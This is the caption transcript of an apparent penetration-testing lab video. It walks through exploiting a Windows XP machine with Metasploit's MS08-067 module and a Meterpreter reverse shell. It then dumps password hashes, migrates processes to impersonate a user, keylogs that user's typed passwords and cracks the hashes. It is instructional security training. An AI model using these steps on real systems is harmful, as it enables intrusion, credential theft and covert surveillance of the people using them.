1 1 00:00:00,381 --> 00:00:01,214 line:15% So in this lab, 2 2 00:00:01,214 --> 00:00:03,615 line:15% we're gonna work on escalating privileges. 3 3 00:00:03,615 --> 00:00:04,448 What we're gonna do here 4 4 00:00:04,448 --> 00:00:06,501 is we're gonna work on stealing passwords 5 5 00:00:06,501 --> 00:00:08,661 and cracking those passwords. 6 6 00:00:08,661 --> 00:00:10,987 Also, we're gonna migrate around from processes 7 7 00:00:10,987 --> 00:00:14,229 from a system level to a user level and back. 8 8 00:00:14,229 --> 00:00:15,372 To get started we need to open up 9 9 00:00:15,372 --> 00:00:17,455 our Metasploit Framework. 10 10 00:00:22,983 --> 00:00:24,199 From our Metasploit Framework, 11 11 00:00:24,199 --> 00:00:26,476 we're gonna use the same exploit we did last time. 12 12 00:00:26,476 --> 00:00:27,309 So we'll just type in 13 13 00:00:27,309 --> 00:00:31,476 use exploit/windows/smb/mso8_067_netapi. 14 14 00:00:34,780 --> 00:00:36,401 Then we're gonna set our payload, 15 15 00:00:36,401 --> 00:00:38,195 and we're gonna use the Meterpreter payload 16 16 00:00:38,195 --> 00:00:39,621 that we used before which is 17 17 00:00:39,621 --> 00:00:43,788 windows/meterpreter/reverse_tcp. 18 18 00:00:46,405 --> 00:00:48,504 Now, at this point, we're gonna show our options, 19 19 00:00:48,504 --> 00:00:49,655 and you'll notice that we need to set 20 20 00:00:49,655 --> 00:00:51,463 our RHOST and our LHOST. 21 21 00:00:51,463 --> 00:00:54,525 So we're gonna set our RHOST for our Windows machine. 22 22 00:00:54,525 --> 00:00:56,389 In my case, 23 23 00:00:56,389 --> 00:00:59,407 the IP for that is .56.100, 24 24 00:00:59,407 --> 00:01:04,245 and then I'm gonna set my LHOST to my Kali machine, 25 25 00:01:04,245 --> 00:01:07,365 which in my case is 56.102. 26 26 00:01:07,365 --> 00:01:09,685 Then, I will show my options one more time. 27 27 00:01:09,685 --> 00:01:11,081 You'll see at this point 28 28 00:01:11,081 --> 00:01:13,759 that I have my Windows machine IP as my RHOST. 29 29 00:01:13,759 --> 00:01:16,201 We're gonna be attacking Port 445 30 30 00:01:16,201 --> 00:01:18,279 with the netapi vulnerability. 31 31 00:01:18,279 --> 00:01:20,703 We're gonna use our payload of Meterpreter 32 32 00:01:20,703 --> 00:01:21,999 and we're gonna have the call back 33 33 00:01:21,999 --> 00:01:25,799 go back to our Kali machine on Port 4444. 34 34 00:01:25,799 --> 00:01:26,632 Now at this point, 35 35 00:01:26,632 --> 00:01:29,382 we're just gonna type in exploit. 36 36 00:01:30,335 --> 00:01:31,195 Just like before, 37 37 00:01:31,195 --> 00:01:33,261 we now have an established connect 38 38 00:01:33,261 --> 00:01:34,477 where we're triggered the vulnerability 39 39 00:01:34,477 --> 00:01:35,578 in the Windows XP machine 40 40 00:01:35,578 --> 00:01:37,962 and it is called back to us with stage two. 41 41 00:01:37,962 --> 00:01:40,922 We have that connection from the Windows machine, 42 42 00:01:40,922 --> 00:01:45,567 from the Windows machine here to our Kali machine here. 43 43 00:01:45,567 --> 00:01:48,106 Now we're at the Meterpreter prompt, so what do we wanna do? 44 44 00:01:48,106 --> 00:01:49,013 Well, the first thing I want to do 45 45 00:01:49,013 --> 00:01:51,493 is I wanna know what process I am. 46 46 00:01:51,493 --> 00:01:53,733 I'm gonna type in getpid, 47 47 00:01:53,733 --> 00:01:55,973 and it tells me that I'm process 980. 48 48 00:01:55,973 --> 00:01:57,130 To understand what that is, 49 49 00:01:57,130 --> 00:01:58,213 I'm gonna type in ps, 50 50 00:01:58,213 --> 00:02:00,119 which is gonna list all of the running processes 51 51 00:02:00,119 --> 00:02:02,338 on the Windows machine. 52 52 00:02:02,338 --> 00:02:05,838 Here you can see that the running process, 53 53 00:02:08,226 --> 00:02:10,695 expand this just a little bit more for you. 54 54 00:02:10,695 --> 00:02:13,517 As you can see, process 980 is right here. 55 55 00:02:13,517 --> 00:02:15,522 It's the service host process. 56 56 00:02:15,522 --> 00:02:19,863 That is actually the system-level user, NT AUTHORITY\SYSTEM. 57 57 00:02:19,863 --> 00:02:20,696 Right now, we already have 58 58 00:02:20,696 --> 00:02:22,399 system-level rights on this machine, 59 59 00:02:22,399 --> 00:02:24,495 so there's no need to escalate our privileges, 60 60 00:02:24,495 --> 00:02:27,033 but if we were a lower-level user, 61 61 00:02:27,033 --> 00:02:28,879 we would have to escalate our privileges up. 62 62 00:02:28,879 --> 00:02:31,481 I'm gonna show you some techniques for doing that as well. 63 63 00:02:31,481 --> 00:02:33,303 The reason why we are a system-level user in this case 64 64 00:02:33,303 --> 00:02:36,309 is because the exploit we're doing is the service host 65 65 00:02:36,309 --> 00:02:39,546 and the service host is always run as SYSTEM. 66 66 00:02:39,546 --> 00:02:42,383 If instead we use something like a spearfishing campaign, 67 67 00:02:42,383 --> 00:02:44,346 we would end up being brought in as that user 68 68 00:02:44,346 --> 00:02:45,885 who probably doesn't have admin rights, 69 69 00:02:45,885 --> 00:02:47,650 and we'd have to work our way up. 70 70 00:02:47,650 --> 00:02:49,639 We can still run a lot of those same processes, 71 71 00:02:49,639 --> 00:02:51,799 like hash dumps and password cracking, 72 72 00:02:51,799 --> 00:02:54,442 to start from there and migrate upward. 73 73 00:02:54,442 --> 00:02:56,105 Now that we see what process we're in, 74 74 00:02:56,105 --> 00:02:59,173 let's go ahead and see what system ID we do have. 75 75 00:02:59,173 --> 00:03:00,903 Let's type in getsid. 76 76 00:03:00,903 --> 00:03:05,130 You'll notice that it says we are S-1-5-18. 77 77 00:03:05,130 --> 00:03:09,103 Anything under 500 is gonna be a system-level type process, 78 78 00:03:09,103 --> 00:03:10,418 whether that's gonna be something like 79 79 00:03:10,418 --> 00:03:14,061 the LOCAL SERVICE or the SYSTEM itself. 80 80 00:03:14,061 --> 00:03:15,181 Once we get into users, 81 81 00:03:15,181 --> 00:03:17,879 they start out at 1000 and go above. 82 82 00:03:17,879 --> 00:03:20,897 If you're the administrator, that's a 500-level account. 83 83 00:03:20,897 --> 00:03:22,202 This last dash number here 84 84 00:03:22,202 --> 00:03:23,061 is gonna tell us a lot about 85 85 00:03:23,061 --> 00:03:27,381 what type of process that is and what type of user we are. 86 86 00:03:27,381 --> 00:03:28,780 Now that we're here, 87 87 00:03:28,780 --> 00:03:30,426 let's go ahead and do our hash dump, 88 88 00:03:30,426 --> 00:03:31,259 and we'll see what other users 89 89 00:03:31,259 --> 00:03:32,759 are on the system. 90 90 00:03:34,815 --> 00:03:35,648 Here we go. 91 91 00:03:35,648 --> 00:03:36,515 We have the Administrator account. 92 92 00:03:36,515 --> 00:03:38,634 Again, that's that SID 500. 93 93 00:03:38,634 --> 00:03:41,109 We have a Guest, which is SID 501. 94 94 00:03:41,109 --> 00:03:43,503 We have the HelpAssistant, starts at 1000. 95 95 00:03:43,503 --> 00:03:47,722 The John Sim user is user 1003. 96 96 00:03:47,722 --> 00:03:50,503 Then we have this SUPPORT account, which is 1002. 97 97 00:03:50,503 --> 00:03:51,336 What I'm gonna do is I'm just gonna 98 98 00:03:51,336 --> 00:03:53,759 copy all of this text here 99 99 00:03:53,759 --> 00:03:55,106 and we're gonna put it into a text file, 100 100 00:03:55,106 --> 00:03:57,081 and we're gonna save that to our desktop. 101 101 00:03:57,081 --> 00:03:59,383 To do that, I'm just gonna open the Terminal here. 102 102 00:03:59,383 --> 00:04:00,711 I'm gonna type in gedit, 103 103 00:04:00,711 --> 00:04:02,587 which is a graphical text editor 104 104 00:04:02,587 --> 00:04:05,117 and we can just Paste that in. 105 105 00:04:05,117 --> 00:04:06,978 Then we're gonna go ahead and save it to the Desktop 106 106 00:04:06,978 --> 00:04:08,487 so we'll know where it is. 107 107 00:04:08,487 --> 00:04:10,987 We'll just call that hashdump. 108 108 00:04:12,301 --> 00:04:13,134 At this point, 109 109 00:04:13,134 --> 00:04:16,449 we can close that out and we can close out that one. 110 110 00:04:16,449 --> 00:04:18,071 Now we have a text file with that information 111 111 00:04:18,071 --> 00:04:20,345 so we can use that in our password cracking. 112 112 00:04:20,345 --> 00:04:21,447 Before we get to that, 113 113 00:04:21,447 --> 00:04:22,429 I'm gonna still play with Meterpreter 114 114 00:04:22,429 --> 00:04:25,207 a little bit more here first and show you some other things. 115 115 00:04:25,207 --> 00:04:26,365 One of the things I talked about before 116 116 00:04:26,365 --> 00:04:29,426 is that we can do a migration from one process to another. 117 117 00:04:29,426 --> 00:04:31,709 That should change us into that user. 118 118 00:04:31,709 --> 00:04:35,682 For instance, right now, we are in process 980, 119 119 00:04:35,682 --> 00:04:38,153 which is this NT AUTHORITY\SYSTEM. 120 120 00:04:38,153 --> 00:04:39,959 Now, if I wanted to become John Sim, for instance, 121 121 00:04:39,959 --> 00:04:41,762 the user on this machine, 122 122 00:04:41,762 --> 00:04:43,378 because if I start running things in SYSTEM 123 123 00:04:43,378 --> 00:04:45,333 like the Notepad, that would look suspicious, 124 124 00:04:45,333 --> 00:04:47,482 but if I did it as John Sim, it wouldn't. 125 125 00:04:47,482 --> 00:04:48,315 I'm gonna go ahead 126 126 00:04:48,315 --> 00:04:49,802 and change myself into this one right here, 127 127 00:04:49,802 --> 00:04:52,581 which is process 1248, 128 128 00:04:52,581 --> 00:04:54,638 and that should change me into John Sim, 129 129 00:04:54,638 --> 00:04:57,903 who has a SID of 1003. 130 130 00:04:57,903 --> 00:04:59,663 What we're gonna do is just type in migrate 131 131 00:04:59,663 --> 00:05:03,619 and the PID we wanna go to, which in this case is 1248. 132 132 00:05:03,619 --> 00:05:06,703 So, migrate to 1248. 133 133 00:05:06,703 --> 00:05:09,786 You'll see that we're migrating from 980 to 1248. 134 134 00:05:09,786 --> 00:05:11,285 It take a couple seconds. 135 135 00:05:11,285 --> 00:05:13,466 Now we should be loaded into that process. 136 136 00:05:13,466 --> 00:05:14,700 It says we're complete. 137 137 00:05:14,700 --> 00:05:16,191 Let's get PID and make sure 138 138 00:05:16,191 --> 00:05:18,553 that we are in the process we wanted. 139 139 00:05:18,553 --> 00:05:21,641 Getpid, we verified we are in 1248. 140 140 00:05:21,641 --> 00:05:25,540 Now if I do ps, you can see that 1248 141 141 00:05:25,540 --> 00:05:27,715 is a process owned by John Sim. 142 142 00:05:27,715 --> 00:05:30,196 Let's get our SID and verify that. 143 143 00:05:30,196 --> 00:05:32,633 It should tell us that we're SID 1003, 144 144 00:05:32,633 --> 00:05:35,113 because that's John Sim's SID. 145 145 00:05:35,113 --> 00:05:38,691 In this case, we do have SID 1003, 146 146 00:05:38,691 --> 00:05:40,185 which is John Sim. 147 147 00:05:40,185 --> 00:05:41,018 That's how you can migrate 148 148 00:05:41,018 --> 00:05:43,535 from one user to another and one process to another. 149 149 00:05:43,535 --> 00:05:45,317 Why else might you wanna migrate processes? 150 150 00:05:45,317 --> 00:05:47,499 Well, we'll talk about covering our tracks later, 151 151 00:05:47,499 --> 00:05:48,395 but one of the things we wanna do 152 152 00:05:48,395 --> 00:05:51,411 is to cover our tracks is to migrate from processes. 153 153 00:05:51,411 --> 00:05:52,637 For instance, if we did a vulnerability, 154 154 00:05:52,637 --> 00:05:54,963 such as a Internet Explorer exploit, 155 155 00:05:54,963 --> 00:05:56,747 Internet Explorer tends to crash a lot. 156 156 00:05:56,747 --> 00:05:59,109 If the process I'm sitting in crashes, 157 157 00:05:59,109 --> 00:06:00,512 I'm gonna lose my access. 158 158 00:06:00,512 --> 00:06:02,693 If I break in through Internet Explorer, 159 159 00:06:02,693 --> 00:06:03,869 I'm gonna want to migrate to something 160 160 00:06:03,869 --> 00:06:05,447 more stable and more hidden, 161 161 00:06:05,447 --> 00:06:07,789 such as the service host account 162 162 00:06:07,789 --> 00:06:10,107 or the services.exe 163 163 00:06:10,107 --> 00:06:11,808 or explorer.exe, 164 164 00:06:11,808 --> 00:06:12,721 because they're a lot more stable 165 165 00:06:12,721 --> 00:06:14,845 and they don't crash as often. 166 166 00:06:14,845 --> 00:06:16,207 Now, the other thing to know 167 167 00:06:16,207 --> 00:06:18,469 is why might I wanna go to a user 168 168 00:06:18,469 --> 00:06:20,140 that's not System or Admin? 169 169 00:06:20,140 --> 00:06:22,018 Like in this case, John Sim's a regular user. 170 170 00:06:22,018 --> 00:06:24,061 Why would I wanna migrate into him? 171 171 00:06:24,061 --> 00:06:25,513 Well, one of the reason why I might wanna do that 172 172 00:06:25,513 --> 00:06:27,218 is if I wanted to do key logging. 173 173 00:06:27,218 --> 00:06:29,798 If I wanted to key log John Sim, 174 174 00:06:29,798 --> 00:06:32,093 I have to be logged in as John Sim. 175 175 00:06:32,093 --> 00:06:34,359 In this case, I now am John Sim, 176 176 00:06:34,359 --> 00:06:37,559 so I can start my key logger and capture those keystrokes. 177 177 00:06:37,559 --> 00:06:38,595 We talked about this before, 178 178 00:06:38,595 --> 00:06:40,677 but I'll go ahead and show that to you now because again, 179 179 00:06:40,677 --> 00:06:42,501 this is another way to escalate our privileges. 180 180 00:06:42,501 --> 00:06:44,721 If John happens to have admin rights 181 181 00:06:44,721 --> 00:06:46,593 and he's on his user account daily 182 182 00:06:46,593 --> 00:06:47,793 and then types in his password 183 183 00:06:47,793 --> 00:06:49,873 to elevate into an admin status, 184 184 00:06:49,873 --> 00:06:51,793 like he installed a new printer or something like that, 185 185 00:06:51,793 --> 00:06:53,558 we'd be able to capture that password. 186 186 00:06:53,558 --> 00:06:55,182 Let me bring up the key logger commands here again, 187 187 00:06:55,182 --> 00:06:56,425 just to remind us. 188 188 00:06:56,425 --> 00:06:58,249 We'll go up here to Help 189 189 00:06:58,249 --> 00:07:01,155 and we have our keyscan_start, 190 190 00:07:01,155 --> 00:07:04,595 keyscan_stop, and again, our keyscan_dump 191 191 00:07:04,595 --> 00:07:06,162 to get those keystrokes. 192 192 00:07:06,162 --> 00:07:07,323 Let's go ahead and start it 193 193 00:07:07,323 --> 00:07:09,240 by doing keyscan_start. 194 194 00:07:13,729 --> 00:07:15,862 If I go here and do a keyscan_start 195 195 00:07:15,862 --> 00:07:18,101 and now John Sim is on his machine. 196 196 00:07:18,101 --> 00:07:20,945 Let's say he was opening up a Notepad 197 197 00:07:20,945 --> 00:07:23,862 and typing in his passwords. 198 198 00:07:27,531 --> 00:07:31,297 Here's my email address and my password of P@$$w0rd. 199 199 00:07:31,297 --> 00:07:32,137 Then he decides you know, 200 200 00:07:32,137 --> 00:07:33,961 that's really not a secure way to save my passwords. 201 201 00:07:33,961 --> 00:07:35,603 I'm gonna go ahead and delete those. 202 202 00:07:35,603 --> 00:07:38,003 He just gets rid of that, never had any evidence. 203 203 00:07:38,003 --> 00:07:42,109 Well, we happened to capture it because we 204 204 00:07:42,109 --> 00:07:44,555 were capturing his keystrokes. 205 205 00:07:44,555 --> 00:07:45,569 Right here, you can see it. 206 206 00:07:45,569 --> 00:07:48,227 He pressed Return, he did Password List, 207 207 00:07:48,227 --> 00:07:51,649 hit Return, typed in that, hit Return, and then P@$$w0rd. 208 208 00:07:51,649 --> 00:07:53,131 Why might this be useful? 209 209 00:07:53,131 --> 00:07:56,086 Well, if I had my key scanner going the whole time 210 210 00:07:56,086 --> 00:07:57,387 and I'm capturing all this data, 211 211 00:07:57,387 --> 00:07:59,743 I can capture his side of all conversations. 212 212 00:07:59,743 --> 00:08:02,005 All his instant messages, all his emails, 213 213 00:08:02,005 --> 00:08:03,550 all his usernames and passwords. 214 214 00:08:03,550 --> 00:08:05,502 All this information is stuff that I can use 215 215 00:08:05,502 --> 00:08:06,619 to elevate my permissions 216 216 00:08:06,619 --> 00:08:09,246 and spread laterally into other systems. 217 217 00:08:09,246 --> 00:08:12,002 I might now have his usernames and password for his banking, 218 218 00:08:12,002 --> 00:08:14,979 his Facebook, his Twitter, all of that stuff, 219 219 00:08:14,979 --> 00:08:16,658 because we captured all those keystrokes. 220 220 00:08:16,658 --> 00:08:18,563 It's a pretty cool technique. 221 221 00:08:18,563 --> 00:08:20,707 Now, going back to our escalating privileges, 222 222 00:08:20,707 --> 00:08:24,813 we're still sitting here as John Sim as the user. 223 223 00:08:24,813 --> 00:08:26,237 The next thing we wanna look at 224 224 00:08:26,237 --> 00:08:29,003 is migrating back to SYSTEM 225 225 00:08:29,003 --> 00:08:30,085 and we'll go ahead and do that. 226 226 00:08:30,085 --> 00:08:31,761 We'll just do a ps, 227 227 00:08:31,761 --> 00:08:34,086 so we can figure out what process we wanna go to, 228 228 00:08:34,086 --> 00:08:37,363 and we can go ahead and migrate ourself into 229 229 00:08:37,363 --> 00:08:39,169 980 again, just like we were before, 230 230 00:08:39,169 --> 00:08:40,533 and go back to SYSTEM. 231 231 00:08:40,533 --> 00:08:43,033 We'll just migrate 980. 232 232 00:08:44,251 --> 00:08:45,952 Again, that's gonna move us back and at this point, 233 233 00:08:45,952 --> 00:08:49,202 we should now be the system-level user. 234 234 00:08:51,326 --> 00:08:52,414 We'll do that getpid. 235 235 00:08:52,414 --> 00:08:53,603 We're in 980. 236 236 00:08:53,603 --> 00:08:55,763 Getsid, we're back to the system-level user, 237 237 00:08:55,763 --> 00:08:57,907 which is that -18. 238 238 00:08:57,907 --> 00:08:58,777 One other thing I'll show you. 239 239 00:08:58,777 --> 00:09:00,633 We're gonna go back to John Sim here one more time 240 240 00:09:00,633 --> 00:09:02,034 'cause I forgot to show this to you. 241 241 00:09:02,034 --> 00:09:05,367 We'll go back to his PID which was 1248. 242 242 00:09:09,710 --> 00:09:11,027 Now we're back here. 243 243 00:09:11,027 --> 00:09:14,549 You can see that we are user 1003, again that's John Sim. 244 244 00:09:14,549 --> 00:09:15,934 Another way to get SYSTEM 245 245 00:09:15,934 --> 00:09:17,566 is actually using the commands getsystem, 246 246 00:09:17,566 --> 00:09:18,747 and it's part of Meterpreter. 247 247 00:09:18,747 --> 00:09:20,667 If you just type in getsystem, 248 248 00:09:20,667 --> 00:09:24,002 it will go ahead and move and get you system-level access. 249 249 00:09:24,002 --> 00:09:26,403 Now, if I get my SID, 250 250 00:09:26,403 --> 00:09:29,667 I am back here as the system level. 251 251 00:09:29,667 --> 00:09:32,519 Now, let's see what process it put us in. 252 252 00:09:32,519 --> 00:09:34,163 We're still in John's process, 253 253 00:09:34,163 --> 00:09:36,229 but we are the system user now. 254 254 00:09:36,229 --> 00:09:37,853 That's something else that you can look at here. 255 255 00:09:37,853 --> 00:09:41,318 It's an interesting technique and it works most of the time. 256 256 00:09:41,318 --> 00:09:42,614 Now, the time this won't work 257 257 00:09:42,614 --> 00:09:46,781 is if you are some low-level account that's below a user. 258 258 00:09:49,307 --> 00:09:51,062 If we look up here in the process list, 259 259 00:09:51,062 --> 00:09:52,302 you'll see that there's this 260 260 00:09:52,302 --> 00:09:54,185 LOCAL SERVICE account, for instance. 261 261 00:09:54,185 --> 00:09:55,159 This isn't even a user account. 262 262 00:09:55,159 --> 00:09:56,101 This is below user. 263 263 00:09:56,101 --> 00:09:57,678 All it does is local services. 264 264 00:09:57,678 --> 00:10:01,299 This happens to be for the sound drivers in my system. 265 265 00:10:01,299 --> 00:10:03,237 You also have this NETWORK SERVICES. 266 266 00:10:03,237 --> 00:10:05,654 These processes have such low-level access, 267 267 00:10:05,654 --> 00:10:08,177 you can't migrate back into John or back into SYSTEM 268 268 00:10:08,177 --> 00:10:10,214 because you're too low a level at that point. 269 269 00:10:10,214 --> 00:10:11,709 The only way to break back into this 270 270 00:10:11,709 --> 00:10:13,251 is actually to exit out of the system 271 271 00:10:13,251 --> 00:10:14,830 and then re-exploit the system. 272 272 00:10:14,830 --> 00:10:16,361 Be careful where you jump into 273 273 00:10:16,361 --> 00:10:18,638 because if you have system- or domain-level rights 274 274 00:10:18,638 --> 00:10:20,137 and you go down to a standard user 275 275 00:10:20,137 --> 00:10:21,795 to do something like a keystroke, 276 276 00:10:21,795 --> 00:10:24,131 depending on that user's level of access, 277 277 00:10:24,131 --> 00:10:26,174 you can actually get yourself stuck in that user 278 278 00:10:26,174 --> 00:10:28,848 and you're gonna be done at that point. 279 279 00:10:28,848 --> 00:10:30,725 That's why being able to have their password 280 280 00:10:30,725 --> 00:10:32,805 to be able to log in as them is very important. 281 281 00:10:32,805 --> 00:10:34,827 That's where our hashdump came in. 282 282 00:10:34,827 --> 00:10:37,445 If you remember, we had run the hashdump command 283 283 00:10:37,445 --> 00:10:40,219 and we got all of these hashes. 284 284 00:10:40,219 --> 00:10:41,376 What I ended up doing with them 285 285 00:10:41,376 --> 00:10:43,691 is I put them in this text file. 286 286 00:10:43,691 --> 00:10:44,524 What we're gonna do is we're gonna use 287 287 00:10:44,524 --> 00:10:45,655 a program called johnny. 288 288 00:10:45,655 --> 00:10:46,596 Under applications, 289 289 00:10:46,596 --> 00:10:50,215 we'll go into Password Attacks and click on johnny. 290 290 00:10:50,215 --> 00:10:53,319 Now from johnny, we're gonna Open a password file. 291 291 00:10:53,319 --> 00:10:55,959 The file we're gonna open is on our desktop 292 292 00:10:55,959 --> 00:10:57,677 and it's called hashdump. 293 293 00:10:57,677 --> 00:10:59,597 That was the file that we put in the text. 294 294 00:10:59,597 --> 00:11:00,541 As we go through it, 295 295 00:11:00,541 --> 00:11:01,941 it immediately starts and it starts 296 296 00:11:01,941 --> 00:11:03,767 going through the attack for us. 297 297 00:11:03,767 --> 00:11:05,487 It's gonna try to crack any of the passwords 298 298 00:11:05,487 --> 00:11:07,980 it can find based on the hashes. 299 299 00:11:07,980 --> 00:11:10,847 Here, you see Administrator was already cracked as PASSWORD, 300 300 00:11:10,847 --> 00:11:12,429 and it's working on John Sim. 301 301 00:11:12,429 --> 00:11:14,427 So far, it doesn't know what the first part is, 302 302 00:11:14,427 --> 00:11:17,245 but it got the last two letters which is H-O. 303 303 00:11:17,245 --> 00:11:19,159 Now, this is doing a brute force attack. 304 304 00:11:19,159 --> 00:11:20,298 This can take a long time 305 305 00:11:20,298 --> 00:11:23,153 as it tries to crack things if they're not real words. 306 306 00:11:23,153 --> 00:11:26,378 In the case of John Sim, this actually say DOCTORWHO. 307 307 00:11:26,378 --> 00:11:29,663 The first part of it is gonna be DOCTOR with a W at the end. 308 308 00:11:29,663 --> 00:11:30,543 That's not a real word, 309 309 00:11:30,543 --> 00:11:31,802 so it's gonna take a long time 310 310 00:11:31,802 --> 00:11:33,621 for it to go through and do its cracking. 311 311 00:11:33,621 --> 00:11:35,338 Now, something that'll be a lot quicker 312 312 00:11:35,338 --> 00:11:36,437 is for us to go to something 313 313 00:11:36,437 --> 00:11:38,334 like CrackStation on the Internet. 314 314 00:11:38,334 --> 00:11:39,357 Let's go ahead and I'll show you 315 315 00:11:39,357 --> 00:11:42,061 how that works with John Sim here. 316 316 00:11:42,061 --> 00:11:43,138 When we created our Kali machine, 317 317 00:11:43,138 --> 00:11:45,335 we didn't allow copy and pasting from Kali 318 318 00:11:45,335 --> 00:11:46,519 back to our desktop environment. 319 319 00:11:46,519 --> 00:11:47,837 I'm gonna have to actually type that in. 320 320 00:11:47,837 --> 00:11:51,004 It's cdd3ae5197aa40cc477a180ba53335e6. 321 321 00:12:03,915 --> 00:12:06,055 Then we're gonna go ahead and put in the code over here, 322 322 00:12:06,055 --> 00:12:09,437 which Diesel LION, is what it looks like, 323 323 00:12:09,437 --> 00:12:11,303 and then crack the hash. 324 324 00:12:11,303 --> 00:12:12,136 You'll see how quickly 325 325 00:12:12,136 --> 00:12:15,386 it's gonna come back with CrackStation. 326 326 00:12:17,458 --> 00:12:18,291 Comes back immediately 327 327 00:12:18,291 --> 00:12:20,538 and it gives us lots of different choices 328 328 00:12:20,538 --> 00:12:22,527 of what it thinks it could be 329 329 00:12:22,527 --> 00:12:26,293 based on the fact that we have that particular hash. 330 330 00:12:26,293 --> 00:12:28,191 Now, why are there multiple things 331 331 00:12:28,191 --> 00:12:30,677 that it could be based on this hash? 332 332 00:12:30,677 --> 00:12:32,055 The reason why we have this duplication 333 333 00:12:32,055 --> 00:12:34,597 is there's actually repetition in the hash tables. 334 334 00:12:34,597 --> 00:12:35,653 One of the reasons for that 335 335 00:12:35,653 --> 00:12:38,751 is that LM hashes only support 14 characters. 336 336 00:12:38,751 --> 00:12:40,407 Anything over 14 characters, 337 337 00:12:40,407 --> 00:12:42,218 what it does is it breaks them in half, 338 338 00:12:42,218 --> 00:12:44,239 seven letters and seven letters, 339 339 00:12:44,239 --> 00:12:46,639 hashes each part and then goes again. 340 340 00:12:46,639 --> 00:12:48,341 In our case, 341 341 00:12:48,341 --> 00:12:50,892 you'll see the fact that we have this doctorWoodland, 342 342 00:12:50,892 --> 00:12:52,950 DOCTORWHOWEBGUIDE, doctorwhowebguide, 343 343 00:12:52,950 --> 00:12:55,880 and if you hash any of these, it goes back to the same hash. 344 344 00:12:55,880 --> 00:12:57,883 Now, what does this tell us? 345 345 00:12:57,883 --> 00:13:00,475 Because now we're like oh, which one do we choose? 346 346 00:13:00,475 --> 00:13:02,513 Well, if we go back to our Jack the Ripper, 347 347 00:13:02,513 --> 00:13:04,806 if you remember, we ended up having, 348 348 00:13:04,806 --> 00:13:08,125 if we count the letters, D-O-C-T-O-R-W. 349 349 00:13:08,125 --> 00:13:09,190 That is the first seven. 350 350 00:13:09,190 --> 00:13:14,134 Notice that all of these first seven are the same, doctorw. 351 351 00:13:14,134 --> 00:13:16,134 That's gonna give us the first seven letters guaranteed. 352 352 00:13:16,134 --> 00:13:16,977 Well, the nice thing was 353 353 00:13:16,977 --> 00:13:20,433 we had already found the last two letters was H-O. 354 354 00:13:20,433 --> 00:13:24,315 We could figure out now, it's doctor, W-H-O, DOCTORWHO. 355 355 00:13:24,315 --> 00:13:26,315 Then we can use that as the password to get it. 356 356 00:13:26,315 --> 00:13:27,937 There's a little bit of work here required, 357 357 00:13:27,937 --> 00:13:28,838 and again, eventually, 358 358 00:13:28,838 --> 00:13:30,917 johnny is gonna go through and crack it all for us, 359 359 00:13:30,917 --> 00:13:34,000 but it hasn't been able to do it yet. 360 360 00:13:36,456 --> 00:13:39,174 Now, there's one more program here that we can use. 361 361 00:13:39,174 --> 00:13:40,085 In fact, there's lots of different programs 362 362 00:13:40,085 --> 00:13:41,411 we can use for password cracking. 363 363 00:13:41,411 --> 00:13:43,454 Another one that's really good is ophcrack. 364 364 00:13:43,454 --> 00:13:44,995 Now, ophcrack does require you 365 365 00:13:44,995 --> 00:13:46,014 to have an Internet connection 366 366 00:13:46,014 --> 00:13:47,410 so you can download the tables 367 367 00:13:47,410 --> 00:13:48,549 because if you don't have the tables, 368 368 00:13:48,549 --> 00:13:50,658 it's not really effective. 369 369 00:13:50,658 --> 00:13:54,243 If you go into this area where Table Selection is 370 370 00:13:54,243 --> 00:13:55,566 and you click Install, 371 371 00:13:55,566 --> 00:13:56,947 you'll be able to install the tables 372 372 00:13:56,947 --> 00:13:59,141 once you download them to your system, 373 373 00:13:59,141 --> 00:13:59,974 but we're gonna have to connect 374 374 00:13:59,974 --> 00:14:02,507 the Kali box to the Internet first to do that. 375 375 00:14:02,507 --> 00:14:04,283 Now, where do you get those tables from? 376 376 00:14:04,283 --> 00:14:05,542 well, if you click on help, 377 377 00:14:05,542 --> 00:14:08,049 it'll tell you exactly where to go. 378 378 00:14:08,049 --> 00:14:10,870 You can go to ophcrack.sourceforge.net 379 379 00:14:10,870 --> 00:14:13,766 and there is a bunch of tables that they have for you, 380 380 00:14:13,766 --> 00:14:16,145 including the XP free, XP free fast, 381 381 00:14:16,145 --> 00:14:18,310 and Vista free fast rainbow tables. 382 382 00:14:18,310 --> 00:14:20,091 If you want other tables, they do sell those, 383 383 00:14:20,091 --> 00:14:21,489 but they do have a cost to them. 384 384 00:14:21,489 --> 00:14:22,584 Since we're using XP machine, 385 385 00:14:22,584 --> 00:14:25,686 we can download the XP free small or XP free fast 386 386 00:14:25,686 --> 00:14:28,166 to try to do this rainbow cracking on your own, 387 387 00:14:28,166 --> 00:14:29,686 and see how much more effect it is 388 388 00:14:29,686 --> 00:14:31,787 than doing the methods we just saw. 389 389 00:14:31,787 --> 00:14:33,643 Again, going through CrackStation, 390 390 00:14:33,643 --> 00:14:34,840 all the tables are already loaded 391 391 00:14:34,840 --> 00:14:35,926 and it's very quick and easy 392 392 00:14:35,926 --> 00:14:38,509 line:15% for you to get those passwords.